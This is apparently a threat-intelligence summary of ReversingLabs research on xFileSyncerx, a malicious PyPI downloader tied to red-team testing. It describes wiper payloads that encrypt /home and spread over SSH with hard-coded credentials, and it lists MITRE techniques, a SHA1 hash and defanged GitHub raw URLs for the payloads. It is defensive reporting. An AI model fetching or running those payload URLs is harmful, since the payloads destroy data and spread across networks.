Threat Research

Python downloader highlights noise problem in open source threat detection

Reversinglabs

ReversingLabs researchers uncovered a malicious PyPI package named xFileSyncerx containing downloader and wiper components (s2.py and s3.py) tied to red-team testing. The case highlights growing open-source threat noise, where test/grayware can blur legitimate supply-chain risks and hinder detection.
#xFileSyncerx #s2.py #s3.py #d3duct1v #BellJ1 #PyPI #GitHub

Keypoints

  • xFileSyncerx is a PyPI package that includes separate malicious wiper components (s2.py and s3.py) and was distributed with obfuscated code.
  • The downloader (xFileSyncerx) fetches a second-stage payload from a remote URL, indicating a staged malware chain.
  • s2.py encrypts files under /home with Fernet, excluding hidden files to preserve SSH functionality, and includes a README message that references a computer meme.
  • s2.py later attempts lateral movement by using hard-coded SSH credentials to spread to other devices; s3.py is a similar wiper payload without spreading.
  • The author behind the tool claims to be a US-based penetration tester; the packages were used for red-team testing of a client’s SOC.
  • The incident illustrates escalating “noise” in open-source ecosystems (goodware, malware, grayware) and the challenge of distinguishing genuine threats from test artifacts; calls for clearer publishing guidelines for test/grayware packages.
  • IOCs identified include the PyPI package xFileSyncerx (0.0.2, SHA1 e200d11a089e66840598b104b57e9758855031b3) and GitHub raw URLs for s2.py and s3.py.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – ‘downloading second stage malware from a remote URL.’
  • [T1027] Obfuscated/Compressed Files or Information – ‘presence of code obfuscation’ and obfuscated download URL content.
  • [T1021.004] SSH – ‘spreads across the local network by leveraging SSH to try to connect to other devices using hard coded credentials.’
  • [T1078] Valid Accounts – ‘hard coded credentials’ used to attempt SSH login to lateral movement targets.
  • [T1486] Data Encrypted for Impact – ‘encrypt all files except hidden files’ during the wiper activity.

Indicators of Compromise

  • [Package] PyPI – xFileSyncerx, version 0.0.2 – SHA1 e200d11a089e66840598b104b57e9758855031b3
  • [URL] GitHub raw payloads – hxxps://raw.githubusercontent.com/d3duct1v/tester-of-trees/main/s2.py, hxxps://raw.githubusercontent.com/d3duct1v/tester-of-trees/main/s3.py

Read more: https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint